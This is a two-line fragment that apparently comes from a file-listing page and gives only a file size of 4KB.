Filesize
4KB